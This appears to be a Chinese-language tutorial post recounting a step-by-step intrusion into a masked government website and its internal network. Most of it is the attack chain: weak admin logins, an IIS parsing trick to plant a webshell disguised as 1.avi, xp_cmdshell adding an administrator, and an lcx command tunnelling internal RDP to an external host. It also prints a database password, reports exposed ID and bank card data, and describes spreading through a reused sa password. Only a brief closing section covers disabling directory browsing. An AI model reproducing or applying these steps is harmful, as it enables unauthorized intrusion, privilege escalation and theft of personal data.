从目录信息泄露到渗透内网

信息安全公益宣传，信息安全知识启蒙。

加微信群回复公众号：微信群；QQ群：16004488

加微信群或QQ群可免费索取：学习教程

教程列表见微信公众号底部菜单

1、目录信息泄露

目录信息泄露是指当当前目录无index.html/index.asp/index.php/index.asp.net等指定主页的情况下，直接显示目录下所有的文件及其目录。测试方法和简单，在网站路径后输入目录名称即可，一般的扫描软件会自动识别该漏洞，如图1所示，显示该网站存在目录漏洞。

图1  存在目录泄露漏洞

2、发现后台弱口令

在目录泄露的基础上，发现网站存在后台管理地址，使用弱口令admin/admin顺利登陆该投票管理系统，如图2所示。出现目录泄露漏洞的网站后台密码一般都比较简单，比如admin/123456、admin/admin、admin/admin888等。

图2  获取后台弱口令

3、泄露文件信息

如图3所示，通过分析网站的源代码，从源代码中去寻找文件夹，发现存在UpLoadFolder 文件夹，通过地址http://**.*******.gov.cn/UpLoadFolder/进行访问，在该文件夹下有大量的上传文件，单击这些文件链接，可以直接下载文件到本地。

图3  上传的所有文件

4、发现数据库文件

在该网站hzh目录发现存在db目录，继续访问，如图4所示，可以看到存在db.mdb，如果网站未做安全设置，该数据库文件可以直接下载。

图4  发现数据库文件

5、发现涉及个人隐私的文件

如图5所示，在网站myupload文件夹下，发现大量的txt文件，打开后，在该文件中包含大量的个人基本信息，身份证账号以及银行卡信息等。

图5  泄露个人银行卡信息

6、发现上传文件模块

在网站继续查看泄露目录，如图6所示，获取了memberdl目录，逐个访问文件，其中aa.aspx为文件上传模块。在一些文件上传页面中可以直接上传webshell。

图6  获取上传页面

7、构造文件解析漏洞

在文件上传页面，通过查看，发现可以直接创建自定义文件，在该目录中创建1.asp文件夹，如图7所示，可以直接船舰1.asp文件夹；然后选择文件上传，如图8所示，构造一个webshell的avi文件，文件名称为1.avi。

图7  创建1.asp文件夹

图8  上传1.avi文件

通过浏览1.avi获取文件的url地址，如图9所示，将多数体链接地址复制下来，直接获取webshell，使用中国菜刀管理工具，顺利获取webshell，如图10所示。

图9  获取webshell地址

图10  获取webshell

8、获取数据库密码

通过中国菜刀后门管理工具，上传一个asp的大马，有时候webshell会被查杀或者防火墙拦截，如图11所示上传一个免杀的webshell大马，通过大马对网站文件进行查看，在web.config文件中获取了mssql数据库sa账号和密码“fds%$fDF”。

图11  获取数据库密码

9、MSSQL数据库直接提权

在webshell中，选择提权工具-数据库操作，如图12所示，选择组件检测，获取该操作系统为windows2003，数据库为最高权限。

图12  检测组件

在系统命令中执行添加用户和添加用户到管理员操作，如图13，图14所示，选择cmd_xpshell执行即可添加用户和到管理员组。

图13  添加用户和组

图14  查看管理员组

10、使用lcx穿透进入内网

（1）上传lcx文件到C:\ydcz\cl目录

（2）执行命令C:\ydcz\cl\lcx.exe -slave 122.115.**. ** 4433 10.0.11.129 3389

如图15所示，该命令表示将10.0.11.129的3389端口连接到122.115. **.**的4433端口。

（3）在122.115. **. **服务器上执行lcx –slave 4433 3389，如图16所示。

图15  执行端口转发

图16  执行监听

（4）在122.115.**.**服务器使用mstsc登录地址127.0.0.1:4433，如图17所示，输入用户名和密码后，成功进入服务器。

图17  成功进入内网服务器

11、查看和扫描内网

可以使用端口扫描工具对内网IP进行扫描，有可以通过查看网络邻居-查看工作组计算机来获取内网是否存在多台个人计算机或者服务器，如图18所示，显示该内网存在几十台个人桌面及服务器。

图18  发现内网存在多台服务器和个人主机

12、利用已有信息进行渗透

在本例中获取的sa口令是进行内网权限扩展的一个好思路，通过扫描获取10.0.11.31服务器的sa跟掌握的口令一样，通过SQL Tools进行连接，如图19所示，成功获取当前权限为system权限，直接可以添加用户登录3389。

图19  获取系统权限

由于本案例的目地是介绍通过信息泄露渗透进入内网，对内网的渗透仅仅是通过sa口令进行扩展，在本案例中，通过扫描，发现存在5台计算机使用相同的sa口令，这五台计算机都是系统权限。在这个基础上继续渗透基本可以获取整个网络的权限。

13、目录信息泄露防范

（1）禁止Apache显示目录索引，禁止Apache显示目录结构列表，禁止Apache浏览目录。

将httpd.conf中的Options Indexes FollowSymLinks # 修改为：Options  FollowSymLinks

修改Apache配置文件httpd.conf

搜索“Options Indexes FollowSymLinks”，修改为“Options-Indexes FollowSymLinks”即可。

在Options Indexes FollowSymLinks在Indexes前面加上“–”符号。“+”代表允许目录浏览；“–”代表禁止目录浏览，这样的话就属于整个Apache禁止目录浏览了。通过.htaccess文件，可以在根目录新建或修改 .htaccess 文件中添加“Options –Indexes”就可以禁止Apache显示目录索引。

（2）在IIS中需要设置“网站属性”-“主目录”-“目录浏览”，即不选择即可。选择表示允许目录浏览。